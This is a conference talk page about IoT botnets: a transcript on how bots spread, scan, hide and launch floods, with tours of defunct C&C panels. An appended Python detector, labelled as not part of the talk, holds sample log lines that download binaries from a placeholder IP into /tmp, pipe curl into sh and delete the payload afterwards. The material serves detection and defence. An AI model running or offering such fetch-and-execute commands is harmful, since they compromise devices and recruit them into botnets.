
BSides Berlin 2021: Aditya K Sood - Internet of Things or Threats

BSides Berlin · 25:05 · 68 views · Published 2021-09
About this talk
About the talk: This talk is primarily structured to demonstrate attacks that are happening via IoT devices running in the wild. The demonstrations will highlight detecting and compromising IoT C&C panels, and live attacks executing from compromised IoT devices used as launchpads. We will cover more than 10 C&C panels related to different IoT botnets and infections. The demonstration will help the audience understand the IoT threats occurring in real time. In addition, we will also discuss the inherent techniques and tactics adopted to analyze IoT bot binaries and detect C&C panels.

About the speaker: Aditya K Sood (Ph.D.) is a cybersecurity advisor, practitioner, researcher, and consultant. With more than 14 years of experience, he provides strategic leadership in the field of information security covering products and infrastructure. Dr. Sood has research interests in cloud security, IoT security, malware automation and analysis, application security, and secure software design. He has authored several papers for various magazines and journals including IEEE, Elsevier, Crosstalk, ISACA, Virus Bulletin, and USENIX. His work has been featured in several media outlets including Associated Press, Fox News, The Register, Guardian, Business Insider, CBC, and others. He has been an active speaker at industry conferences and has presented at Black Hat, DEFCON, HackInTheBox, RSA, Virus Bulletin, OWASP, and many others. Dr. Sood obtained his Ph.D. from Michigan State University in Computer Sciences. Dr. Sood is also the author of the books "Targeted Cyber Attacks" and "Empirical Cloud Security". He has held positions such as Senior Director of Threat Research and Security Strategy, Head (Director) of Cloud Security, Chief Architect of Cloud Threat Labs, Lead Architect and Researcher, Senior Consultant, and others while working for companies such as F5 Networks, Symantec, Blue Coat, Elastica, IOActive, Coseinc, and KPMG.
Transcript (en)

Welcome, everyone. I hope you are having a great time at the conference. It's pretty early in the morning in San Francisco here, so bear with me on a few things. So let's get started. Today we are going to talk about Internet of Things or Threats. We really need to understand what exactly it is all about. We're going to look into IoT bots and how botnets are designed. We're going to focus primarily on some of the tactics and techniques these IoT bots use, and of course the botnet operators deploy those techniques, and we're also going to look at a few demos breaking down the IoT botnet C&C panels internally.

So let's get started. First, a little disclaimer: all the research and interesting information that we are going to share during the course of this talk is only for community purposes, which means that we're going to strengthen the threat hunting efforts, intelligence efforts and all those, making sure that we make our security community more secure and more collaborative in nature. A little brief background of mine: I've been in this industry for 14 years now and have authored a couple of books, so you get an idea that we know about the topic we are going to discuss today, and if you're really interested in looking at my background and what it is all about, you can go to a few URLs here and

get an idea what it is all about. So what are we going to talk about today? We're going to look into IoT threats. If you look around at the internet hemisphere, IoT devices are deployed and configured all across the internet and various networks, and attackers are utilizing these devices because of insecure characteristics and inherent security issues, maybe vulnerabilities, misconfigurations and all that, and how they actually exploit them, of course using an automated way, because a botnet at the end of the day is a collection of compromised machines. In this case, when we talk about IoT botnets, it's more focused on compromised IoT devices. And we're going to take a look into multiple IoT C&C panels that we

discovered during the course of this research, and that actually highlights to you, and you will get an idea, how exactly these panels look. It might be different from the standard botnets because of the different communication protocol being used, but you will get an interesting idea by encountering this thing via live demo. So let's understand which world we are living in right now, of course, IoT threats. These are a couple of media headlines I have put up here so that you can get an idea how severe the problem is. Just imagine billions of people all across the globe using the internet, and to support that internet functionality we really need hardware devices. Of course we are moving towards

the cloud, but at the end of the day there are still data centers, there are chips, there are IoT devices that are allowing this functionality to flourish. But of course we are living in a world where cybercrime is increasing at an exponential rate, and of course attackers are going to target these IoT devices as well, and that is, I would say in their terms, a need of the hour, because they want to utilize the free hardware that is sitting on the internet, not secured, and they want to exploit those devices and harness the power of those devices, and the idea is to just conduct various operations on the internet to make sure

they achieve what they want to. The overall perspective here is that this is a very, very deep and a very, very interesting problem that, as security researchers and practitioners, we really need to look into, making sure what advancements we can make to actually circumvent these IoT threats. In order to do that, we really need to understand how these bots are designed and operated. In this case, for the next seven to ten minutes we are going to look into some of the IoT bots' attacks and mechanisms, including different characteristics. It is very important to understand how these devices are getting exploited and what techniques these IoT attackers are using to conduct these unauthorized operations. Let's take a look into it.

So what we are going to look into in this context is the distribution of IoT binaries, of course how the IoT binaries are distributed across the internet. We're going to look at some of the characteristics, like why camouflaged IoT binaries are used, obviously packing being used, exploits embedded in those IoT binaries, interesting self-deletion capabilities, of course executing mass scans, distributed denial of service attacks, and at the end how these IoT bots are actually utilizing the inherent system tools to trigger the execution of various exploits or unauthorized operations on the operating system itself. Any device running Linux, Unix or any flavor of it, at the end of the day you really need to

control the operating system from the user level to the kernel level to ensure you conduct, you operate and trigger those kinds of functionalities which IoT bots need. In order to do that, they really need to be on that system, exploit a vulnerability, for example a privilege escalation and all that, so we'll take a look into that as well. So let's move forward with this. The very first thing I want to talk about here is the distribution of IoT binaries. A couple of screenshots I did here give you the idea. One of the interesting scenarios that we have seen all across is the setting up of an exposed web server on the internet. It can either

be on cloud infrastructure or it can be on compromised servers, data centers, sort of things like that, and they simply deploy a web server which is unauthenticated, and they just host the resources on that server for a short period of time, so that when the malware is distributed and the payloads are executed on the IoT devices, they actually contact these web servers. Of course, since there is no authentication or authorization, you can simply connect to them either by the wget tool or the curl tool and then fetch the resources on the compromised IoT device. And the idea in this case is that, since everything is compromised in here, the web resources are

openly available on the internet, and you can connect to it and then you can download those additional payloads and start executing those payloads on the compromised IoT device. And that is one of the important parts we really need to understand, because that's the place where the infection starts. So the distribution of IoT binaries is an important part, and as a part of the research we really need to conduct scans and build intelligence to find where exactly these binaries are located, supporting multiple architectures depending on which architecture certain devices support. Another interesting artifact that I want to call out here is the use of camouflaged names. So let's say you have this web resource which you are seeing in the screenshot,

and it's exposed on the internet, of course it has to be, but if you look at the naming convention being used here, and the way IoT bots are using it, or maybe the attackers are using this naming convention, it looks like these are legit binaries: dns, dns scan, aldapaldev scan and so on, but in fact these are malicious in nature. So as a result, when you look at these binaries initially on the operating system, when you're doing a bit of scanning or when you're looking for your own purpose, you see these binaries look legit, but exactly it is not. So in that case we cannot rely on the basic naming or the basic structure. We really need to

do a little bit more content inspection and understand how these binaries are interacting with the operating system. So generally, as a part of remembrance, this is one part where camouflaged binaries are distributed across the internet as well, and we really need to make sure that we differentiate between these binaries when we are analyzing them. Another interesting characteristic in the way these IoT bots are designed: attackers of course use some sort of packers, making sure that it impacts reverse engineering efforts a bit, but that should not stop you. I mean, there is no way that if the bot is packed you cannot unpack it, but interestingly it actually adds another layer of effort to unpack the

bot and then make sure that you are able to get the right payloads out of it before you start analyzing it. But that is more important, that you conduct all these steps, making sure that you know, for the IoT bots or any bot you are specifically analyzing, how it looks, how the structure looks, whether it is an ELF binary, which architecture is supported, whether it's packed or not. So we really need to see that, and that is a thing we have seen across many IoT bots. In this case the example highlights a UPX packer, but you can unpack it; more effort is needed in that direction. Another interesting scenario that you need to look into is the embedded exploits

of the IoT binaries. Remember, these are scripts that are installed on the IoT devices, primarily in the temp directory, because that's where these files are fetched, and what happens in that case, they have embedded payloads. Since most of these IoT devices are somewhat connected to the internet and have very low security from a configuration perspective, which means the ingress and egress rules are pretty easy in nature, you can connect to anything on the internet depending on whether it's HTTP traffic and all that, which makes it quite easy to actually embed the exploits in IoT bots and execute them. So if you look at this particular example, it's just an exploit related to the Linksys router,

but you can see that the bot payload already has the HTTP POST requests for where they want to do it. So it means attackers are compromising one IoT device and using that IoT device to execute exploits by mass-scanning other IoT devices on the internet. So if you find a particular port that is open, whether it's HTTP-specific or any other protocol, Telnet, RDP and all, you can actually go ahead and utilize that IoT device that is compromised and then trigger exploits against other known or unknown IoT devices on the internet. So generally, if you have any protection solution in place or detection solution in place, they see that this attack is coming from one specific IoT

device, not exactly any other system. So it seems like attackers are playing a lot by compromising IoT devices and utilizing one to attack the other. I think that's a part of the chain of infections, and that's how you build IoT botnets, a network of bots. Another interesting tactic that you really need to look into is self-deletion and removal of stored payloads. So most of the time what we have seen is that in the temp directory on these IoT devices, temporary scripts are being downloaded, and once those scripts are executed on the system, they have a self-deletion module in it, which means they are going to clean the temp directory, and once the

payloads are executed and start opening network communication channels, sockets and all that, they actually clean the raw binary, which means, as a part of the self-deletion, reducing the number of artifacts that are staying on the operating system after the execution, to ensure that when any researchers come across it and any post-execution analysis is performed, they are not able to find most of the content of the payload and all that. I mean, there are still other ways, but you have to dig pretty deep into it. But this picture here represents, as an example, if we look into the update or asset file in the temp directory, how it executes the command and what exactly it

does, and then it actually cleans it. So if you look at the rm -rf, it then starts cleaning those binaries as well. The next one is executing mass scans. So your IoT device is compromised, and what do you want to do with it? Of course you want to utilize the power and harness the power of that device to trigger more mass scans on the internet so that you find more vulnerable devices and exploit them and make them a part of the IoT botnet. So these few examples highlight to you exactly how the IoT devices, compromised in nature, are conducting scans against, for example, other Android IoT devices, looking at TCP port number 5555,

which is the Android debug port, and a Telnet scan on port 23 in the second figure. So you can conduct multiple types of scan with that as well. So the next one is looking at triggering denial of service attacks. Of course, I mean, if you have a network of IoT bots that are communicating with each other and working as one network, you want to utilize that network to conduct some unexpected scans and launch denial of service attacks that these bots support. So if we have an N number of IoT bots in the network, you can utilize those N number of bots to trigger dedicated scans on a variety of ports utilizing different communication

channels. So a few examples that we highlighted here are taken from the C&C panels directly. So you have a variety of TCP floods that you can trigger: UDP plain, STD, VSE, OVH, games, STOMP, frag, XMAS, and you can go for basically an application-layer denial of service as well as a network-layer denial of service targeting other dedicated resources on the internet. And that is one of the important parts, and everybody who conducts research in this field knows that denial of service is one of the important functionalities these bots and botnets provide. Another interesting thing which I really want to highlight, a very important one, is the utilization of

the system tools. So when a couple of these scripts are installed on IoT devices, primarily because these IoT devices are running some version of Linux or some version of Unix on them, they actually have some sort of system tools available by default, some of them related to, for example, the curl utility, the wget utility and similar things like that. So if you have those utilities available in the system and you have a very insecure configuration where you allow connecting to anything on the internet, then once you install these scripts, they actually utilize those tools to fetch more binaries onto the system, IoT bot payloads or some BusyBox kind of

libraries if it is not installed on the IoT device, and they actually utilize them to automate the process of downloading more infectious tools onto the system. But at first they utilize the system's power tools. It means whenever you're analyzing IoT bots, conducting research, you need to make sure you look into the usage of these tools as well. For example, if you're analyzing logs, you want to see how these tools are being used, where they are connecting to, how long they are connecting to the remote destination on the internet. But this is one of the very important plays that these attackers go for, and then conduct the various operations, as I

discussed earlier, on the internet. But these system tools play a critical role in that as well. So a few examples highlighted here: you can see that BusyBox is used in conjunction with wget, here we are having base64 encoder/decoder functionality, Python and all that, but this is all part and parcel of the malicious toolkit that these IoT bots use. So now, since we have gone through understanding how critical IoT threats are and how they exist, and looked into some of the attack techniques and tactics, we really need to look into a few demonstrations here, and the important part is to get a feel of how it looks.

So let's go through the first one. In this simple one-minute demo, what I am exactly highlighting is the internal details of the Verizon IoT botnet C&C panel. Let's take a look into it. So as a part of the research we're logging back into the C&C panel, which is not active anymore, but we made a video because it was active only for a few hours, and I try to highlight how it looks and how we really need to build intelligence out of it

using some of the commands here. Now you can see which functionality the C&C provides, what kind of activities can be performed. Yeah, so this is a quick overview of how it looks, and it gives you the idea of the different kinds of operation that you can perform from this C&C panel. And just imagine, this C&C panel is not similar to the different botnets that we have analyzed earlier, or the world has seen, like Zeus, SpyEye, Citadel and many others like that. Those are much more operated, and the C&C panels are hosted as a web resource because they utilize HTTP communication. In this particular case it is just a custom version that is

being deployed on top of the Telnet protocol, and that's how they actually design these IoT bot C&C panels. Now in the next video I'm going to do a detailed look into multiple C&C panels, so that you can imagine the design stays the same but there are many C&C panels that exist in the wild. Earlier you have seen the Verizon IoT panel; now I'm going to show you multiple panels, how they look and the functionalities they provide.

So this is an example of the Kawari IoT bot, and all these panels are now gone, so that's why we are presenting this video, just to try to give you an idea of how the real world looks, how the underground cyber community works. Whatever we are doing on the internet in front is not exactly what is happening in the back end. So this is another example of an IoT bot, another one.

These are like small botnets, not many IoT bots residing in them, but still they can do damage if they want to, and this is an example of the Dank net; still they have some bots residing in that.

Yeah, so the purpose of showing a quick demo about what the internal structure of C&C panels is and how different communication channels are utilized is so you can get an idea of what kind of research you need to perform down the lane to strengthen your existing security detection and protection solutions, so that you can actually deploy those solutions in the real world and prevent these kinds of attacks. But in order to do that, we have to really go deep into understanding the internal architecture of these IoT botnets, how they operate, how these bots are distributed, how they spread infections, and how exactly they create chain infections and related artifacts. So after going through and understanding

what IoT threats look like, how exponentially these IoT threats are increasing, and going through characteristics and functionalities and looking at a few demos, I would like to make a call, as a part of it, friends: security is not a one-step process, security is a continuous process. We need a multi-faceted approach to build intelligence in order to circumvent and defend against threats in the IoT hemisphere, which means that one approach is not going to work and we will not survive with that. We really need a multi-step approach, a very deep defense-in-depth layered mechanism where every layer is good enough to provide security, and then we actually go for building strong and robust protection solutions

to defend our internet infrastructure against these nefarious attacks. But at the end of the day we really need a multi-faceted approach. So I'll stop here. Any questions and queries? I hope you enjoyed this talk, and I would love to have more discussion on this front. Feel free to ask any queries, and I appreciate all your time and support for attending this talk. Thank you very much.
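As an added example (not part of the talk, its slides or any tool the speaker describes), the following Python script turns several behaviors described in the talk into detection logic that a defender could run over device logs: payload fetches into a world-writable directory via wget/curl/BusyBox, camouflaged binary names such as "dns", the fetch-then-execute-then-delete chain behind self-deletion, download-and-pipe-to-shell, base64 decoding, and one source sweeping Telnet (23) and Android debug (5555) ports across many hosts. The shell log lines, flow records, IP addresses (RFC 5737 documentation ranges) and the camouflage watch-list are all constructed for this example and are assumptions, not data from the talk.

```python
import re
from collections import defaultdict

# Constructed sample of command lines from a shell/session log on a monitored
# Linux IoT device (made-up data; 203.0.113.0/24 is a documentation range).
SAMPLE_SHELL_LOG = """\
2021-09-01T10:00:01 sh: cd /tmp || cd /var/run || cd /mnt
2021-09-01T10:00:02 sh: /bin/busybox wget http://203.0.113.7/bins/dns -O /tmp/dns
2021-09-01T10:00:03 sh: chmod +x /tmp/dns
2021-09-01T10:00:03 sh: /tmp/dns
2021-09-01T10:00:04 sh: rm -rf /tmp/dns
2021-09-01T10:00:05 sh: curl -s http://203.0.113.7/bins/update.sh | sh
2021-09-01T10:00:06 sh: echo aGVsbG8= | base64 -d
2021-09-01T10:01:00 sh: ls -la /etc
"""

# Constructed flow records (timestamp, src, dst, dport) in NetFlow style:
# one source sweeping Telnet and the Android debug port, one unrelated flow.
SAMPLE_FLOWS = (
    [("10:05:00", "192.0.2.10", f"198.51.100.{i}", 23) for i in range(1, 7)]
    + [("10:05:01", "192.0.2.10", f"198.51.100.{i}", 5555) for i in range(1, 4)]
    + [("10:05:02", "192.0.2.20", "198.51.100.50", 443)]
)

FETCH_RE = re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")
WRITABLE_RE = re.compile(r"(/tmp/\S+|/var/run/\S+|/dev/shm/\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+\S+\s+(\S+)")
RM_RE = re.compile(r"\brm\s+-\S*[rf]\S*\s+(\S+)")
PIPE_SH_RE = re.compile(r"\|\s*(?:busybox\s+)?(?:sh|bash)\b")
B64_RE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")
# Names that mimic legitimate daemons/tools; a constructed watch-list (assumption).
CAMOUFLAGE_NAMES = {"dns", "dnsscan", "sshd", "telnetd", "ntpd", "update", "scan"}
SCAN_PORTS = {23, 5555}   # Telnet and Android debug bridge, as named in the talk


def analyze_shell_log(log_text):
    """Return (rule, line_no, detail) findings for suspicious command chains."""
    findings = []
    state = defaultdict(dict)   # path -> {"fetched": n, "chmod": n, "exec": n}
    for n, raw in enumerate(log_text.splitlines(), 1):
        cmd = raw.split(" sh: ", 1)[1] if " sh: " in raw else raw
        m = WRITABLE_RE.search(cmd)
        path = m.group(1).rstrip(";|&") if m else None
        if FETCH_RE.search(cmd):
            if path:                       # download into a writable directory
                findings.append(("tmp_download", n, path))
                state[path]["fetched"] = n
                if path.rsplit("/", 1)[-1] in CAMOUFLAGE_NAMES:
                    findings.append(("camouflaged_name", n, path))
            if PIPE_SH_RE.search(cmd):     # fetch piped straight into a shell
                findings.append(("pipe_to_shell", n, cmd))
        m = CHMOD_RE.search(cmd)
        if m and m.group(1) in state:
            state[m.group(1)]["chmod"] = n
        if path and cmd.strip().startswith(path) and "fetched" in state.get(path, {}):
            state[path]["exec"] = n        # the fetched file itself is run
        m = RM_RE.search(cmd)
        if m and "exec" in state.get(m.group(1), {}):
            # fetched, executed, then removed: the self-deletion pattern
            findings.append(("fetch_exec_delete", n, m.group(1)))
        if B64_RE.search(cmd):
            findings.append(("base64_decode", n, cmd))
    return findings


def detect_mass_scan(flows, threshold=5):
    """Flag (src, port, count) where one source hits >= threshold distinct hosts on scan ports."""
    targets = defaultdict(set)   # (src, dport) -> distinct destinations
    for _ts, src, dst, dport in flows:
        if dport in SCAN_PORTS:
            targets[(src, dport)].add(dst)
    return sorted((src, port, len(d)) for (src, port), d in targets.items()
                  if len(d) >= threshold)


if __name__ == "__main__":
    for rule, line_no, detail in analyze_shell_log(SAMPLE_SHELL_LOG):
        print(f"line {line_no}: {rule}: {detail}")
    for src, port, count in detect_mass_scan(SAMPLE_FLOWS):
        print(f"mass_scan: {src} touched {count} hosts on port {port}")
```

The shell-log rules are deliberately stateful: a lone `chmod +x` or `rm -rf` in `/tmp` is noise on many devices, but the same path being fetched, made executable, run and then deleted within a session is the exact artifact-reduction behavior the talk describes, so that chain is reported as one finding. The scan detector keys on distinct destinations per source and port rather than raw packet counts, which keeps a device that legitimately talks Telnet to one management host from being flagged.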